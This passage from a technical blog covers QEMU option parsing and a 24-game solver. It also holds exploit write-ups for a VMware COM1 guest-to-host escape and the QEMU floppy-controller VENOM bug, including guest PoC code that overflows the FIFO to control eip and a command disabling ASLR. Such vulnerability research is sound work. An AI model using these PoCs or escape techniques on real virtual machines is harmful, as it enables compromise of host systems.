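    return [line.strip() for line in hx_text.splitlines()
            if line.strip().startswith("DEF(")]
```
</code></pre></div></div>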
<p>QEMU groups all options into several broad categories; for example, -enable-kvm and -kernel are both machine-related.
Each category is represented by a QemuOptsList, and qemu-config.c defines:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static QemuOptsList *vm_config_groups[48];
</code></pre></div></div>
<p>which means up to 48 categories are supported.
In main, qemu_add_opts adds each QemuOptsList to vm_config_groups:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> qemu_add_opts(&qemu_drive_opts);
qemu_add_drive_opts(&qemu_legacy_drive_opts);
qemu_add_drive_opts(&qemu_common_drive_opts);
qemu_add_drive_opts(&qemu_drive_opts);
qemu_add_opts(&qemu_chardev_opts);
qemu_add_opts(&qemu_device_opts);
qemu_add_opts(&qemu_netdev_opts);
qemu_add_opts(&qemu_net_opts);
qemu_add_opts(&qemu_rtc_opts);
qemu_add_opts(&qemu_global_opts);
qemu_add_opts(&qemu_mon_opts);
qemu_add_opts(&qemu_trace_opts);
qemu_add_opts(&qemu_option_rom_opts);
qemu_add_opts(&qemu_machine_opts);
qemu_add_opts(&qemu_mem_opts);
qemu_add_opts(&qemu_smp_opts);
qemu_add_opts(&qemu_boot_opts);
qemu_add_opts(&qemu_sandbox_opts);
qemu_add_opts(&qemu_add_fd_opts);
qemu_add_opts(&qemu_object_opts);
qemu_add_opts(&qemu_tpmdev_opts);
qemu_add_opts(&qemu_realtime_opts);
qemu_add_opts(&qemu_msg_opts);
qemu_add_opts(&qemu_name_opts);
qemu_add_opts(&qemu_numa_opts);
qemu_add_opts(&qemu_icount_opts);
qemu_add_opts(&qemu_semihosting_config_opts);
qemu_add_opts(&qemu_fw_cfg_opts);
</code></pre></div></div>
<p>Each QemuOptsList stores all the sub-options its category supports, for example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static QemuOptsList qemu_realtime_opts = {
.name = "realtime",
.head = QTAILQ_HEAD_INITIALIZER(qemu_realtime_opts.head),
.desc = {
{
.name = "mlock",
.type = QEMU_OPT_BOOL,
},
{ /* end of list */ }
},
};
</code></pre></div></div>
<p>-realtime supports a single boolean sub-option, i.e. only -realtime mlock=on/off.
Options such as -device are not so rigid: -device prescribes no mandatory sub-options, since there are countless devices and no fixed schema could cover them all; parsing simply splits on "," and "=".
Each sub-option is represented by a QemuOpt structure, defined as:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct QemuOpt {
char *name;
char *str;
const QemuOptDesc *desc;
union {
bool boolean;
uint64_t uint;
} value;
QemuOpts *opts;
QTAILQ_ENTRY(QemuOpt) next;
}
</code></pre></div></div>
<p>name is the string form of the sub-option, and str is the corresponding value.</p>
<p>QemuOptsList is not linked to QemuOpt directly; there is a QemuOpts layer in between. For example, with -device given twice as above, both instances hang off the same QemuOptsList, but as two separate QemuOpts, each with its own chain of QemuOpt. The QemuOpts structure is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct QemuOpts {
char *id;
QemuOptsList *list;
Location loc;
QTAILQ_HEAD(QemuOptHead, QemuOpt) head;
QTAILQ_ENTRY(QemuOpts) next;
};
</code></pre></div></div>
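<p>The splitting on "," and "=" described above can be illustrated with a small sketch, written in Python for brevity. The real parser, qemu_opts_parse in C, additionally handles ids, escaping and typed values, so this is only the general idea; treating a bare leading token as the "driver" value is an assumption modeled on how -device reads its first argument.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>```python
def parse_suboptions(optstr):
    # Split a '-device'-style option string such as
    # 'ivshmem,shm=ivshmem,size=1' into key/value pairs.
    # A bare leading token becomes the implicit 'driver' value.
    opts = {}
    for i, part in enumerate(optstr.split(",")):
        if "=" in part:
            key, _, value = part.partition("=")
            opts[key] = value
        elif i == 0:
            opts["driver"] = part
    return opts
```
</code></pre></div></div>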
<p>The overall structure looks like this:</p>
<p><img src="/assets/img/qemuoptions/1.PNG" alt="" /></p>
<p>With the options used in this article (some, such as -m, omitted):</p>
<p><img src="/assets/img/qemuoptions/2.PNG" alt="" /></p>
<p>Reference: <a href="https://www.ibm.com/developerworks/community/blogs/5144904d-5d75-45ed-9d2b-cf1754ee936a/entry/qemu_2_%25e5%258f%2582%25e6%2595%25b0%25e8%25a7%25a3%25e6%259e%2590?lang=en">QEMU part 2: option parsing</a></p>
<p>IBM's article is not easy to follow, and it contains errors toward the end.</p>
Printing all solutions to the 24 game2015-08-25T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2015/08/25/pointgame
<p>In the 24 game you pick 4 numbers and apply addition, subtraction, multiplication and division (parentheses allowed) to reach 24. "Beauty of Programming" explains the solution methods well; I use its second approach directly. When merging the S sets, you should not deduplicate as the book suggests: equal values may be produced by different computations, and deduplicating there yields the wrong solution count. The right place to deduplicate is at the end, when counting the 24s in S[15]. The program's output:</p>
<p><img src="/assets/img/pointgame/1.PNG" alt="" /></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <iostream>
#include <vector>
#include <set>
#include <algorithm>
#include <iterator>
#include <string>
#include <math.h>
using namespace std;
const double threHold = 1E-6;
struct Node
{
double value;
string exp;
Node(double v, string s) :value(v), exp(s){}
friend bool operator < (const Node &node1, const Node &node2)
{
return node1.value < node2.value;
}
};
class PointGameSolver
{
public:
PointGameSolver(initializer_list<double> li) :init(li)
{
S = new multiset<Node>[static_cast<int>(pow(2, init.size()))];
}
int getResult(set<string>& ans)
{
ans.clear();
calc();
return check(ans);
}
~PointGameSolver()
{
delete[] S;
}
private:
int check(set<string>& result);
multiset<Node> setS(int i);
multiset<Node> getUnion(multiset<Node> a, multiset<Node> b);
multiset<Node> fork(multiset<Node> a, multiset<Node> b);
void calc();
multiset<Node> *S;
vector<double> init;
};
int PointGameSolver::check(set<string>& result)
{
int count = 0;
multiset<Node> ans = S[static_cast<int>(pow(2, init.size()) - 1)];
for (auto it = ans.begin(); it != ans.end(); ++it)
{
if ((it->value - 0) > threHold && fabs(it->value - 24) < threHold)
{
count++;
result.insert(it->exp);
}
}
return result.size();
}
multiset<Node> PointGameSolver::setS(int i)
{
if (!S[i].empty())
return S[i];
for (int x = 1; x < i; ++x)
{
if ((x & i) == x)
S[i] = getUnion(S[i], fork(setS(x), setS(i - x)));
}
return S[i];
}
multiset<Node> PointGameSolver::getUnion(multiset<Node> a, multiset<Node> b)
{
multiset<Node> result;
copy(a.begin(), a.end(), inserter(result, result.begin()));
copy(b.begin(), b.end(), inserter(result, result.begin()));
return result;
}
multiset<Node> PointGameSolver::fork(multiset<Node> a, multiset<Node> b)
{
if (a.empty())
return b;
if (b.empty())
return a;
multiset<Node> result;
for (auto ita = a.begin(); ita != a.end(); ++ita)
{
for (auto itb = b.begin(); itb != b.end(); ++itb)
{
result.insert(Node(ita->value + itb->value, "(" + ita->exp + "+" + itb->exp + ")"));
result.insert(Node(ita->value * itb->value, "(" + ita->exp + "*" + itb->exp + ")"));
result.insert(Node(ita->value - itb->value, "(" + ita->exp + "-" + itb->exp + ")"));
result.insert(Node(itb->value - ita->value, "(" + itb->exp + "-" + ita->exp + ")"));
if (!((fabs(itb->value - 0) < threHold)))
{
result.insert(Node(ita->value / itb->value, "(" + ita->exp + "/" + itb->exp + ")"));
}
if (!((fabs(ita->value - 0) < threHold)))
{
result.insert(Node(itb->value / ita->value, "(" + itb->exp + "/" + ita->exp + ")"));
}
}
}
return result;
}
void PointGameSolver::calc()
{
size_t n = init.size();
for (size_t i = 0; i < n; ++i)
{
S[static_cast<int>(pow(2, i))].insert(Node(init[i], to_string((int)init[i])));
}
for (size_t i = 1; i < pow(2, n); ++i)
{
S[i] = setS(i);
}
}
bool isValid(int *a, int n)
{
for (int i = 0; i < n; ++i)
{
if (a[i] < 1 || a[i] > 10)
return false;
}
return true;
}
int _tmain(int argc, _TCHAR* argv[])
{
int data[4];
while (1)
{
cout << "Enter 4 numbers (1-10, separated by spaces): ";
int i = 0;
while (cin >> data[i++])
{
if (i == 4)
break;
}
if (cin && isValid(data, 4))
{
PointGameSolver pgs({ (double)data[0], (double)data[1], (double)data[2], (double)data[3] });
set<string> ans;
int count = pgs.getResult(ans);
if (!count)
{
cout << "no solution\n";
}
else
{
cout << "total solutions :" << count << endl;
for_each(ans.begin(), ans.end(), [](const string &s) {cout << s << endl; });
}
}
else
cout << "invalid input \n";
cout << "\n";
cout << "continue?(y/n):";
if (!cin)
cin.clear();
cin.ignore(numeric_limits<streamsize>::max(), '\n');
string str;
cin >> str;
if (str != "Y" && str != "y")
break;
}
return 0;
}
</code></pre></div></div>
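<p>The same subset-combination idea is easy to prototype in Python with exact rational arithmetic. This is a sketch of the algorithm rather than a translation of the C++ above: it only reports whether the target is reachable, omitting expression tracking and the final deduplicated solution listing, and using Fraction instead of a floating-point threshold.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>```python
from fractions import Fraction
from itertools import product

def solvable_24(nums, target=24):
    # S[mask] holds every value reachable from the numbers selected by mask.
    n = len(nums)
    S = [set() for _ in range(1 << n)]
    for i, v in enumerate(nums):
        S[1 << i] = {Fraction(v)}
    for mask in range(1, 1 << n):
        sub = (mask - 1) & mask          # largest proper submask
        while 2 * sub > mask:            # visit each unordered split once
            for a, b in product(S[sub], S[mask - sub]):
                S[mask] |= {a + b, a * b, a - b, b - a}
                if b != 0:
                    S[mask].add(a / b)
                if a != 0:
                    S[mask].add(b / a)
            sub = (sub - 1) & mask
    return Fraction(target) in S[(1 << n) - 1]
```
</code></pre></div></div>
<p>Using Fraction keeps comparisons exact; the classic case [3, 3, 8, 8] is solvable only through 8/(3-8/3), where floating-point thresholds can mislead.</p>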
<p>Since someone has actually read to the end, a digression. This was a UCloud interview question: last night a UCloud interviewer called, briefly said they work on network virtualization, and asked whether I was interested. We chatted a bit, and just as I braced myself for a thorough grilling, he simply handed me this problem. Very direct, rather in the dota spirit of "take life and death lightly; if you disagree, fight". So naturally I looked it up, found it in "Beauty of Programming", read the approach, and wrote the code following the book's framework, only to realize when finished that all solutions had to be printed as well. After some thought (I even considered a tuple to hold the expression) I settled on a plain string, changing multiset&lt;double&gt; to multiset&lt;Node&gt;, where Node holds both the value and the expression that produced it. It turned out quite nicely.</p>
Analysis of the VMware COM1 VM-escape vulnerability2015-08-04T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2015/08/04/vmware-com1-escap
<p>This article analyzes the exploitation of the vulnerability described in Google's <a href="https://docs.google.com/document/d/1sIYgqrytPK-CFWfqDntraA_Fwi2Ov-YBgMtl5hdrYd4/preview?sle=true">Escaping VMware Workstation through COM1</a>.</p>
<h3>1. Background</h3>
<p>As a convenience, VMware lets a guest print files and save them on the host, using Microsoft XPS Document Writer as the default printer. The COM1 port is used to talk to vprintproxy.exe on the host. When the guest prints, the EMFSPOOL and EMF files are handed to vprintproxy.exe for processing; because vprintproxy.exe's TPView.dll contains a buffer overflow, a malformed print job can take control of vprintproxy.exe and lead to arbitrary code execution on the host.</p>
<h3>2. Reproducing the vulnerability</h3>
<p>Environment: host Windows 8.1, guest Windows 7, VMware 11.1.0 build-2496824, Python 3.4.3. From the document and my analysis, the bug reproduces essentially whenever TPView.dll is version 8.8.856.1 and iconv.dll is version 1.9.0.1.</p>
<p>Tools: IDA 6.5, x64dbg (here its 32-bit variant, x32dbg).</p>
<p>First, the normal behavior: open an ordinary file in the guest and print it with the printer shown below, which prints the guest document onto the host.</p>
<p><img src="/assets/img/vmwarecom1/1.PNG" alt="" /></p>
<p>Running python.exe poc in the guest (<a href="/assets/file/vmwarecom1/poc">poc</a> is the code at the end of Google's document), we see vprintproxy.exe spawn a calculator process, as shown below.</p>
<p><img src="/assets/img/vmwarecom1/2.PNG" alt="" /></p>
<h3>3. Overview</h3>
<p>The overall flow is shown below.</p>
<p><img src="/assets/img/vmwarecom1/arch.PNG" alt="" /></p>
<p>In Google's exploit, the parts relevant to exploitation are the overflow section and the SHELLCODE section. overflow overruns the buffer and lays out the gadgets; it roughly splits into two parts, called the first and second stage below in execution order. SHELLCODE does the actual work and can be any shellcode that runs on Windows 8.1.</p>
<p>The first four bytes of the first stage ("first eip" in the figure) are the first step of taking eip by overwriting the return address. The first stage's main job is to store at 0x1010ff00 the difference VirtualAlloc - edi, which is 0x00078c48, so that VirtualAlloc's address can be computed dynamically later; the edi value exposed at the trigger point is therefore vital. The first stage also raises the stack top to the four bytes preceding overflow and then executes the second stage. The reason for two stages is that triggering the bug requires placing special data at a few special spots, and those conflict with the layout of first eip and the gadgets that follow it.</p>
<p>The second stage's job is to obtain VirtualAlloc's address dynamically, allocate an executable memory region of 0x10000 bytes, place special instructions in the first 0xC bytes at 0x40000000, and jump to 0x40000000.</p>
<p>The code at 0x40000000 copies the SHELLCODE and other data already read into memory to the addresses starting at 0x40000010, then jumps to 0x40000200, which slides through a run of nop instructions into SHELLCODE.</p>
<p>Since iconv.dll is the only module in the entire process address space loaded without randomization, as figure 4 shows, usable gadgets are scarce, and the construction of the ROP chain is exceptionally artful.</p>
<p><img src="/assets/img/vmwarecom1/3.PNG" alt="" /></p>
<h3>4. Detailed analysis</h3>
<h4>4.1 Overwriting the return address</h4>
<p>From Google's document, the overflow occurs at offset 0x48788 from TPView.dll's load base; with the actual base, the overflow site is 0x03208788, shown in x32dbg below.</p>
<p><img src="/assets/img/vmwarecom1/4.PNG" alt="" /></p>
<p>Analysis shows that the call at 0x03208797 copies 2 bytes at a time to esp+48 (with eip at 0x0320879), and figure 6 shows the state after 8 bytes have been copied (because of stack randomization, take the actual values from the debugger).</p>
<p><img src="/assets/img/vmwarecom1/5.PNG" alt="" /></p>
<p>This corresponds to the beginning of overflow in the exploit. The copy count is held in ebx, 0xAC, so in theory 0xAC*2=0x158 bytes can be copied, and copying more than 0x4C bytes overflows the buffer and overwrites the return address. Running on to 0x032087ba, the stack has by now been entirely overwritten by overflow. Continuing, at 0x03208882 a value is read from esp+118 into edx and later compared against itself plus one to decide a branch (at 0x032088a5); that jump must be taken, so 0x7fffffff has to be placed at esp+118 when laying out overflow. Further on, at 0x032089f8 four bytes are read from esp+110 into edx, and the instruction at 0x03208a01 writes to the memory edx points at, so that address must be writable. That is why WRITABLE in the exploit is 1010ff00, space in iconv.dll's .idata section; note that edx=0x1010ff00 and it never changes afterwards. Because of these two constraints, plus what must happen after taking eip, the layout cannot simply flow straight through like a pipeline. The article uses a rather clever trick: first lay out one part of the shellcode, then raise the stack, then execute the second part.</p>
<h4>4.2 Executing the second stage of overflow</h4>
<p>After the ret at 0x03208adf we arrive at our first eip, 0x1001cae4, an instruction that jumps to InterlockedExchange; note edi at this point, whose value is closely tied to the location holding VirtualAlloc's address. The exploit makes heavy use of InterlockedExchange to place data, with remarkable skill. Control is now at 0x74ec2520, which plainly exchanges [ecx] with eax, where eax and ecx come from esp+C and esp+8. ecx is 0x1010ff00 and eax is 0xf4; this 0xf4 is the distance from the start of overflow to its end, used shortly to redirect control to the top of overflow. The following ret lands at 0x1001c595, which merely pops the earlier 0x1010ff00; the next ret is again 0x1001c595, popping the earlier data. eip then returns to 0x1001cae4. This time the exchange swaps eax=0x00078c48 with the data at address ecx=0x1010ff00, a particularly elegant two-birds-one-stone move: eax becomes 0xf4, the argument for the later call to _alloca_probe, while the value 0x00078c48 now at 0x1010ff00, added to edi, is exactly the address that holds VirtualAlloc's address. Returning from this 0x1001cae4 reaches 0x1001c1e0, the _alloca_probe function, which raises the stack by eax bytes; esp-0xf4 lands on the four bytes before overflow. Because eax and esp are exchanged at 0x1001c1fb, eax now holds the old esp; then eax takes the value at esp, i.e. the value at the very bottom of overflow, 0x1001cae4, which is assigned to the stack top, and the stack top is now within the first four bytes of the first stage of overflow. The ret at 0x1001c201 then goes straight to 0x1001cae4, and the first stage of the overflow shellcode begins to execute.</p>
<h4>4.3 Executing the first stage of the overflow</h4>
<p>Execution starts with the code set up at the end of 4.2 at 0x1001cae4, again the InterlockedExchange gadget; this time it sets the value at 0x10110284 to 0x1001c594. 0x10110284 holds the function address of _io_func, whose role is described below. Returning from this gadget we reach 0x1001c94c, which moves edx into eax and returns (note edx has not changed since being set to 0x1010ff00, so eax is now 0x1010ff00). Next comes 0x100010b1; at 0x100010b4 it executes call [0x10110284], whose target has been replaced with 0x1001c594 — a gadget that does nothing and leads on to the next gadget at 0x1001c594. Then 0x1000cb5c executes dec eax, followed by 0x10003d43 with the instruction add dword ptr ds:[eax+1], edi, which sets the value at 0x1010ff00 to 0x00078c48 + edi = 0x032812d8 — precisely the address holding VirtualAlloc's address. Note that the instruction at 0x10003d94 also raises the stack by 0x10 bytes, so we ret to 0x1001c594 once more. A few pieces of the earlier layout are popped; 0x10001116 pops 0x1010fef8 into ebp, and 0x1001c120 loads the value at ebp+8, i.e. at 0x1010ff00, into eax. Then the gadget at 0x100010b1 runs call [0x10110284] again, popping more of the required layout data. Next, 0x1001c1fc puts VirtualAlloc's address (in eax) into [esp] and returns; with the arguments already laid out on the stack, this allocates 0x10000 bytes at 0x40000000, executable. Then come three more trips through 0x1001cae4 — by now a very familiar gadget — which place 0x8b24438b, 0xa4f21470 and 0x01f3e9 into the first 0xC bytes of the freshly allocated region at 0x40000000, and finally jump to 0x40000000 to execute.</p>
<h4>4.4 Executing the SHELLCODE</h4>
<p>These 0xC bytes form four instructions that copy the data at [esi] — which includes the SHELLCODE — to 0x40000010, then jmp 0x40000200; after a nop sled, the SHELLCODE runs.</p>
<h3>5. Summary</h3>
<p>Two parts of this vulnerability strike me as hard. The first is the EMFSPOOL, EMF and JPEG2000 file formats: building a poc that triggers the bug is not easy. The second is exploitation: with iconv.dll as the only source of gadgets, constructing the ROP chain is very difficult. As the analysis in part 4 showed, the overflow had to be split into two stages, with the stack rising and falling in turn, and the overflow layout had to account for the stack both before and after each lift — extremely skillful work. All in all I consider this a near-perfect exploit.
From VENOM and this vulnerability we can see that virtualization bugs (especially VM escapes) generally arise where the guest talks to the host. In KVM, the vm exit path into the kvm kernel module, and kvm's dispatch of I/O to qemu, should be the main places where bugs occur. Since docker relies on isolation mechanisms provided by the Linux kernel, a kernel vulnerability there carries a particularly high risk.</p>
VENOM vulnerability analysis and exploitation2015-06-26T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2015/06/26/venom
<p>This post analyzes the root cause of the VENOM vulnerability and exploits it via ret2lib with ASLR disabled. The experimental environment is Ubuntu 12.04 x86, kernel 3.2.57, qemu 2.2.0-rc1 — a ready-made development machine in our lab.</p>
<h3>1. Overview</h3>
<p>VENOM, CVE-2015-3456, discovered by Jason Geffner of CrowdStrike, is a vulnerability in QEMU's virtual floppy drive. Because QEMU's device model is widely used by virtualization software such as KVM and Xen, the impact is considerable: an attacker exploiting it can escape the virtual machine and execute code on the host.</p>
<h3>2. Triggering the vulnerability</h3>
<p>According to the article mj posted on the <a href="http://blogs.360.cn/blog/venom-%E6%AF%92%E6%B6%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88qemu-kvm-cve%E2%80%902015%E2%80%903456%EF%BC%89/">360 technical blog</a>, the original poc may fail to trigger the bug — it did not work for me either — so I used the poc from that article. (Some of what follows is also drawn from it; the repetition is only to keep this post self-contained.) Running the poc crashes the VM process. The first version of the poc and the crash are shown below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <sys/io.h>
#include <stdio.h>
#define FIFO 0x3f5
int main()
{
int i;
iopl(3);
outb(0x08e,0x3f5);
for(i = 0;i < 10000000;i++)
outb(0x42,0x3f5);
return 0;
}
</code></pre></div></div>
<p><img src="/assets/img/venom/1.png" alt="" />
<img src="/assets/img/venom/2.png" alt="" /></p>
<p>eip is 42424242, suggesting that eip can be controlled. Below is a brief analysis of the bug, following mj's article.</p>
<h3>3. Vulnerability analysis</h3>
<p>As the poc shows, apart from the iopl call that grants port access, it only executes outb instructions. Each outb causes a vm exit into the kernel, where the kvm module hands the I/O operation off to qemu — that is the rough flow; I will skip the code-level analysis here (I cannot claim to understand it completely myself). The poc keeps writing to the DATA FIFO port. In the qemu source, in hw/block/fdc.c:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const struct {
uint8_t value;
uint8_t mask;
const char* name;
int parameters;
void (*handler)(FDCtrl *fdctrl, int direction);
int direction;
} handlers[] = {
{ FD_CMD_READ, 0x1f, "READ", 8, fdctrl_start_transfer, FD_DIR_READ },
{ FD_CMD_WRITE, 0x3f, "WRITE", 8, fdctrl_start_transfer, FD_DIR_WRITE },
{ FD_CMD_SEEK, 0xff, "SEEK", 2, fdctrl_handle_seek },
{ FD_CMD_SENSE_INTERRUPT_STATUS, 0xff, "SENSE INTERRUPT STATUS", 0, fdctrl_handle_sense_interrupt_status },
{ FD_CMD_RECALIBRATE, 0xff, "RECALIBRATE", 1, fdctrl_handle_recalibrate },
{ FD_CMD_FORMAT_TRACK, 0xbf, "FORMAT TRACK", 5, fdctrl_handle_format_track },
{ FD_CMD_READ_TRACK, 0xbf, "READ TRACK", 8, fdctrl_start_transfer, FD_DIR_READ },
{ FD_CMD_RESTORE, 0xff, "RESTORE", 17, fdctrl_handle_restore }, /* part of READ DELETED DATA */
{ FD_CMD_SAVE, 0xff, "SAVE", 0, fdctrl_handle_save }, /* part of READ DELETED DATA */
{ FD_CMD_READ_DELETED, 0x1f, "READ DELETED DATA", 8, fdctrl_start_transfer_del, FD_DIR_READ },
{ FD_CMD_SCAN_EQUAL, 0x1f, "SCAN EQUAL", 8, fdctrl_start_transfer, FD_DIR_SCANE },
{ FD_CMD_VERIFY, 0x1f, "VERIFY", 8, fdctrl_start_transfer, FD_DIR_VERIFY },
{ FD_CMD_SCAN_LOW_OR_EQUAL, 0x1f, "SCAN LOW OR EQUAL", 8, fdctrl_start_transfer, FD_DIR_SCANL },
{ FD_CMD_SCAN_HIGH_OR_EQUAL, 0x1f, "SCAN HIGH OR EQUAL", 8, fdctrl_start_transfer, FD_DIR_SCANH },
{ FD_CMD_WRITE_DELETED, 0x3f, "WRITE DELETED DATA", 8, fdctrl_start_transfer_del, FD_DIR_WRITE },
{ FD_CMD_READ_ID, 0xbf, "READ ID", 1, fdctrl_handle_readid },
{ FD_CMD_SPECIFY, 0xff, "SPECIFY", 2, fdctrl_handle_specify },
{ FD_CMD_SENSE_DRIVE_STATUS, 0xff, "SENSE DRIVE STATUS", 1, fdctrl_handle_sense_drive_status },
{ FD_CMD_PERPENDICULAR_MODE, 0xff, "PERPENDICULAR MODE", 1, fdctrl_handle_perpendicular_mode },
{ FD_CMD_CONFIGURE, 0xff, "CONFIGURE", 3, fdctrl_handle_configure },
{ FD_CMD_POWERDOWN_MODE, 0xff, "POWERDOWN MODE", 2, fdctrl_handle_powerdown_mode },
{ FD_CMD_OPTION, 0xff, "OPTION", 1, fdctrl_handle_option },
{ FD_CMD_DRIVE_SPECIFICATION_COMMAND, 0xff, "DRIVE SPECIFICATION COMMAND", 5, fdctrl_handle_drive_specification_command },
{ FD_CMD_RELATIVE_SEEK_OUT, 0xff, "RELATIVE SEEK OUT", 2, fdctrl_handle_relative_seek_out },
{ FD_CMD_FORMAT_AND_WRITE, 0xff, "FORMAT AND WRITE", 10, fdctrl_unimplemented },
{ FD_CMD_RELATIVE_SEEK_IN, 0xff, "RELATIVE SEEK IN", 2, fdctrl_handle_relative_seek_in },
{ FD_CMD_LOCK, 0x7f, "LOCK", 0, fdctrl_handle_lock },
{ FD_CMD_DUMPREG, 0xff, "DUMPREG", 0, fdctrl_handle_dumpreg },
{ FD_CMD_VERSION, 0xff, "VERSION", 0, fdctrl_handle_version },
{ FD_CMD_PART_ID, 0xff, "PART ID", 0, fdctrl_handle_partid },
{ FD_CMD_WRITE, 0x1f, "WRITE (BeOS)", 8, fdctrl_start_transfer, FD_DIR_WRITE }, /* not in specification ; BeOS 4.5 bug */
{ 0, 0, "unknown", 0, fdctrl_unimplemented }, /* default handler */
};
</code></pre></div></div>
<p>The FIFO command relevant to the poc is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>FD_CMD_DRIVE_SPECIFICATION_COMMAND = 0x8e
</code></pre></div></div>
<p>The other byte, 0x42, is passed to the handler as a parameter of this command; the handler here is</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>fdctrl_handle_drive_specification_command
</code></pre></div></div>
<p>When qemu receives a FIFO command, it looks the command ID up in the handlers array, then keeps accepting bytes according to the parameter count, storing the command ID and parameters in a buffer. Once all parameters have arrived, the corresponding handler is invoked. The whole FIFO write path is in fdctrl_write_data:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void fdctrl_write_data(FDCtrl *fdctrl, uint32_t value)
{
...
//handle the command
if (fdctrl->data_pos == 0) {
/* Command */
pos = command_to_handler[value & 0xff];
FLOPPY_DPRINTF("%s command\n", handlers[pos].name);
fdctrl->data_len = handlers[pos].parameters + 1;
fdctrl->msr |= FD_MSR_CMDBUSY;
}
//store the command and parameters in fdctrl->fifo
fdctrl->fifo[fdctrl->data_pos++] = value;
if (fdctrl->data_pos == fdctrl->data_len) {
/* We now have all parameters
* and will be able to treat the command
*/
if (fdctrl->data_state & FD_STATE_FORMAT) {
fdctrl_format_sector(fdctrl);
return;
}
pos = command_to_handler[fdctrl->fifo[0] & 0xff];
FLOPPY_DPRINTF("treat %s command\n", handlers[pos].name);
(*handlers[pos].handler)(fdctrl, handlers[pos].direction);
}
}
</code></pre></div></div>
<p>Once the required parameters have been collected, the matching handler runs; for 0x8e that is fdctrl_handle_drive_specification_command:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void fdctrl_handle_drive_specification_command(FDCtrl *fdctrl, int direction)
{
FDrive *cur_drv = get_cur_drv(fdctrl);
if (fdctrl->fifo[fdctrl->data_pos - 1] & 0x80) {
/* Command parameters done */
if (fdctrl->fifo[fdctrl->data_pos - 1] & 0x40) {
fdctrl->fifo[0] = fdctrl->fifo[1];
fdctrl->fifo[2] = 0;
fdctrl->fifo[3] = 0;
fdctrl_set_fifo(fdctrl, 4);
} else {
fdctrl_reset_fifo(fdctrl);
}
} else if (fdctrl->data_len > 7) {
/* ERROR */
fdctrl->fifo[0] = 0x80 |
(cur_drv->head << 2) | GET_CUR_DRV(fdctrl);
fdctrl_set_fifo(fdctrl, 1);
}
}
</code></pre></div></div>
<p>By controlling the data fed into the fifo we bypass both if branches, so neither fdctrl_set_fifo nor fdctrl_reset_fifo is called — and those are precisely the functions that reset the fifo buffer and control whether it is writable. We can therefore keep calling outb to write into the fifo without limit. The fifo is a 512-byte buffer allocated with malloc; writing past 512 bytes overwrites other data and crashes the process.</p>
<h3>4. Locating eip</h3>
<p>Normally a process's heap is very far from its code segment — the heap sits at high addresses and the text at low ones — so eip cannot be overwritten directly by overflowing the heap. Yet this bug does overwrite eip via a heap overflow, presumably by clobbering some dynamically allocated structure on the heap that influences eip. I could not find a Linux counterpart of Immunity Debugger, so it was either write my own pattern file to locate eip or do it by hand. Since my test VM had no network and copying files in was a hassle, I located eip manually. About twenty minutes of binary search showed the bug triggers at roughly 1550 bytes. One thing initially made me believe eip was unstable: each crash wiped the poc's contents, and rerunning the now-empty poc after rebooting the VM naturally triggered nothing (more on this later). With the rough position known I moved to gdb, and debugging pinned it down: the 4 bytes following byte 1516 overwrite eip. The second version of the poc and the crashed eip are shown below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <sys/io.h>
#include <stdio.h>
#define FIFO 0x3f5
int main()
{
int i;
iopl(3);
outb(0x08e,0x3f5);
for(i = 0;i < 1515;i++)
outb(0x42,0x3f5);
for(i = 0;i < 4;i++)
outb(0x43,0x3f5);
for(i = 0;i < 50;++i)
outb(0x44,0x3f5);
return 0;
}
</code></pre></div></div>
<p><img src="/assets/img/venom/3.png" alt="" /></p>
<p>The process crashes as expected with eip = 43434343 — precisely located.</p>
<h3>5. Root-cause analysis</h3>
<p>As noted in part 4, simply overflowing a heap buffer cannot overwrite eip directly; this part analyzes why eip gets overwritten here.
Start the qemu process under gdb, set its arguments, run, and execute the poc inside the VM.</p>
<p><img src="/assets/img/venom/4.png" alt="" /></p>
<p>The VM crashes as expected; bt shows the last frame is aio_bh_poll, at line 82 of async.c.</p>
<p><img src="/assets/img/venom/5.png" alt="" /></p>
<p>Line 82 of aio_bh_poll executes bh-&gt;cb(bh-&gt;opaque);, which calls a callback stored in a QEMUBH structure. The picture is now fairly clear: QEMUBHs form a linked list through their next pointers, each allocated with malloc on the heap of the VM's process; a QEMUBH adjacent to fdctrl-&gt;fifo got overwritten, so aio_bh_poll hit a bogus eip when invoking the callback. After some analysis, the rough layout is as follows:</p>
<p><img src="/assets/img/venom/6.png" alt="" /></p>
<p>While analyzing this part I learned that the aio poll runs in the main thread and handles a certain class of block I/O.</p>
<h3>6. Exploitation</h3>
<p>With the details understood, the next step is exploitation. qemu is a huge program and allocates a great deal on the heap, so there is essentially no limit on payload size. With full control of eip and a nearly unconstrained payload, bypassing ASLR and DEP would make this a truly perfect exploit — arbitrary code execution in the VM process. This was my first Linux exp, and I am not well versed in Linux ASLR/DEP bypasses (I have not done Windows for a while either, though I recall there were plenty of methods). I searched for a long time for articles on Linux ROP, but they were all dated; with every module's base randomized, it seems one needs a bug-specific way to obtain some module or function address to make further progress. So I simply turned ASLR off.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
</code></pre></div></div>
